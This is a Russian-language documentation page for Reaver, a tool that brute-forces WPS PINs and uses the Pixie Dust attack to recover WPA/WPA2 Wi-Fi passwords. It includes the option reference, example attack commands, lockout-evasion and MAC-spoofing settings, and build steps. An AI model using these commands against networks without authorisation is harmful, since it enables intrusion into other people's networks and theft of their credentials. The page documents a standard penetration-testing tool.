Reaver (reaver-wps-fork-t6x)
Описание Reaver
Что такое Reaver?
Reaver предназначен для подборки пина WPS (Wifi Protected Setup) методом перебора. Reaver создан для надёжной и практичной атаки на WPS, он прошёл тестирование на большом количестве точек доступа с разными реализациями WPS. В среднем, Reaver раскрывает пароль WPA/WPA2 в виде простого текста целевой точки доступа (ТД) за 4-10 часов, в зависимости от ТД. На практике, ему обычно нужна половина этого времени на предположение пина WPS и разгадки пароля.
Веб-сайт оригинальной версии — https://code.google.com/p/reaver-wps/. Там ещё есть Pro версия.
Форки Reaver
Т.к. оригинальная версия Reaver не обновлялась с января 2012 года, то был сделан форк. Сайт форка — https://code.google.com/p/reaver-wps-fork/. Последние изменения в форке датируются январём 2014 года.
Жизнь не стоит на месте. И совсем недавно (в апреле 2015 года) была официально выпущена модифицированная версия форка Reaver. Сайт этой модификации — https://github.com/t6x/reaver-wps-fork-t6x. Главное её отличие в том, что она может использовать атаку Pixie Dust для нахождения верного пина WPS. Эта атака применима ко многим точкам доступа Ralink, Broadcom и Realtek.
Атака, используемая для этой версии, разработана Wiire.
Для установки модифицированной версии Reaver, нам нужно установить Pixiewps.
Вместе с Reaver поставляется программа Wash.
Домашняя страница: https://github.com/t6x/reaver-wps-fork-t6x (это страница актуального форка, а не оригинальной версии)
Автор: Tactical Network Solutions, Craig Heffner. Авторы актуального мода: t6_x, DataHead, Soxrok2212
Лицензия: GPLv2
Справка по Reaver
Обязательные аргументы: -i, --interface=<wlan0mon> Имя сетевого интерфейса для использования -b, --bssid=<mac> BSSID точки доступа Опциональные аргументы: -m, --mac=<mac> MAC хостовой системы -e, --essid=<ssid> ESSID целевой ТД -c, --channel=<channel> Установить канал 802.11 для интерфейса (подразумевает -f) -o, --out-file=<file> Установить вывод в лог-файл [stdout] -s, --session=<file> Восстановить файл предыдущей сессии -C, --exec=<command> Выполнить данную команду после успешного подбора пина -D, --daemonize Перевод reaver в режим демона -f, --fixed Отключить прыгание по каналам -5, --5ghz Использовать каналы 5GHz 802.11 -v, --verbose Отображать некритические предупреждения (-vv чтобы увидеть больше) -q, --quiet Отображать только критические предупреждения -h, --help Показать справку Продвинутые опции: -p, --pin=<wps pin> Использовать заданный пин (может быть произвольной строкой или 4/8 цифровым WPS пином -d, --delay=<секунды> Установить задержку между попытками пина [1] -l, --lock-delay=<seconds> Установить время ожидания, если ТД заблокировала попытки вода пина [60] -g, --max-attempts=<номер> Выйти после числа попыток пина -x, --fail-wait=<секунды> Установить время для паузы после 10 неожиданных неудач [0] -r, --recurring-delay=<x:y> Делать паузу на y секунд каждые x попыток пина -t, --timeout=<секунды> Установить пиреод таймаута получения [5] -T, --m57-timeout=<секунды> Установить период таймаута M5/M7 [0.20] -A, --no-associate Не связываться с ТД (связь должна быть сделана другим приложением) -N, --no-nacks Не отправлять сообщения NACK когда получены пакеты о неисправности -S, --dh-small Использовать малые DH ключи для ускорения скорости взлома -L, --ignore-locks Игнорировать заблокированные состояния, полученные от целевой ТД -E, --eap-terminate Завершать каждую сессию WPS пакетом EAP FAIL -n, --nack Целевая ТД всегда шлёт пакеты NACK [Auto] -w, --win7 Мимикрировать под Windows 7 registrar [False] -K --pixie-dust запуск атаки pixiedust -Z запуск атаки pixiedust
Руководство по Reaver
Опция -K // --pixie-dust в reaver
Опция -K 1 запускает pixiewps с PKE, PKR, E-Hash1, E-Hash2, E-Nonce и Authkey. pixiewps будет пытаться атаковать Ralink, Broadcom и Realtek.
*Особая заметка: если вы атакуете ТД Realtek, НЕ используйте малые ключи DH (-S)
Опцию -p // --pin= в Reaver можно использовать с произвольной строкой.
Объяснение популярных опций Reaver
Обычно для Reaver требуется только имя интерфейса и BSSID целевой ТД:
reaver -i wlan0 -b 00:01:02:03:04:05
Предлагается запускать Reaver в вербальном режиме, чтобы получать больше информации о прогрессе атаки и о возможных проблемах:
reaver -i wlan0 -b 00:01:02:03:04:05 -vv
Канал и SSID (при условии, что SSID не скрывается) целевой ТД Reaver определяет автоматически, если они не указаны явным образом в строке команды:
reaver -i wlan0 -b 00:01:02:03:04:05 -c 11 -e linksys
С версии 1.3 в Reaver реализована оптимизация small DH key, предложенная Stefan, которая может увеличить скорость атаки:
reaver -i wlan0 -b 00:01:02:03:04:05 --dh-small
По умолчанию, если ТД переключает каналы, Reaver также соответственно изменяет свой канал. Тем не менее, эту функцию можно отключить, зафиксировав канал интерфейса:
reaver -i wlan0 -b 00:01:02:03:04:05 --fixed
При спуфинге MAC-адреса, вам нужно установить желаемый для спуфинга адрес утилитой ifconfig, и дополнительно сказать Reaver, какой адрес спуфится:
reaver -i wlan0 -b 00:01:02:03:04:05 --mac=AA:BB:CC:DD:EE:FF
Таймаутом получения по умолчанию является период в 5 секунд. Если нужно, таймаут можно установить вручную (минимальным периодом таймаута является 1 секунда):
reaver -i wlan0 -b 00:01:02:03:04:05 -t 2
Дефолтным периодом задержки между попытками ввода пина является 1 секунда. Это значение можно увеличить или уменьшить на любое не отрицательное целое число. Значение 0 означает отсутствие задержки:
reaver -i wlan0 -b 00:01:02:03:04:05 -d 0
Некоторые ТД, когда обнаруживают «подозрительную» активность, временно блокируют их WPS, обычно на пять минут или меньше. По умолчанию, если обнаружено заблокированное состояние, Reaver будет проверять текущее состояние каждые 315 секунд (5 минут и 15 секунд), и остановит брут-форсинг пинов пока не разблокируется WPS.
Эта проверка может быть уменьшена или увеличена на любое не отрицательное целое число:
reaver -i wlan0 -b 00:01:02:03:04:05 --lock-delay=250
Дефолтным периодом ожидания для получения WPS сообщений ответов M5 и M7 является .1 секунда. При необходимости период таймаута может быть установлен вручную (максимальное значение периода равно 1 секунде):
reaver -i wlan0 -b 00:01:02:03:04:05 -T .5
При неверно введённом пине, некоторые неудачные реализации WPS будут отключать соединение, вместо ответа сообщением NACK, как этого требует спецификация. Чтобы обрабатывать эти случаи, по умолчанию при достижении таймаута M5/M7 он трактуется также, как и NACK. Тем не менее, если известно, что целевая ТД отправляет NACKS (большинство делают это), эту функцию можно отключить, для обеспечения большей надёжности. Эта опция в значительной степени бесполезна, поскольку Reaver будет определять автоматически, отвечает ли ТД должным образом с NACK или нет:
reaver -i wlan0 -b 00:01:02:03:04:05 --nack
Хотя для большинства ТД это не имеет значение, иногда необходима отправка EAP FAIL сообщения, для закрытия WPS сессии.
По умолчанию эта функция отключена, но её можно включить для тех ТД, которым это необходимо:
reaver -i wlan0 -b 00:01:02:03:04:05 --eap-terminate
При обнаружении 10 последовательных неожиданных WPS ошибок будет отображаться сообщение предупреждения. Поскольку это может быть признаком того, что имеет место ограничение попыток на ввод пина в ТД, или она просто перегружена, то при появлении этого сообщения можно установить паузу в работе программы:
reaver -i wlan0 -b 00:01:02:03:04:05 --fail-wait=360
Примеры запуска Reaver
reaver -i wlan0mon -b 00:AA:BB:11:22:33 -vv -K 1
Установка Reaver
Программа предустановлена в Kali Linux.
Установка в Debian, Ubuntu, Mint
Начните с установки Pixiewps. Далее:
sudo apt-get -y install build-essential libpcap-dev aircrack-ng git clone https://github.com/t6x/reaver-wps-fork-t6x cd reaver-wps-fork-t6x*/ cd src/ ./configure make sudo make install
Информация об установке в другие операционные системы будет добавлена позже.
Скриншоты Reaver
Инструкции по Reaver
- Атака на Wi-Fi с WPS, используя Reaver
- Решение проблем Reaver: WARNING: Failed to associate with и WPS transaction failed (code: 0x03), re-trying last pin
- Решение проблемы: Reaver показывает WPS пин, но не показывает пароль WPA-PSK
- Решение ошибки reaver: invalid option -- 'K'
- Автоматизированная атака Pixie Dust: получение ПИНов и паролей Wi-Fi без ввода команд
- Взлом WPS с Reaver
- Новое в Wash и Reaver
- Лучшая Wi-Fi карта для Kali Linux
- Подборка совместимых с Kali Linux Wi-Fi адаптеров на 2017
Comments are Closed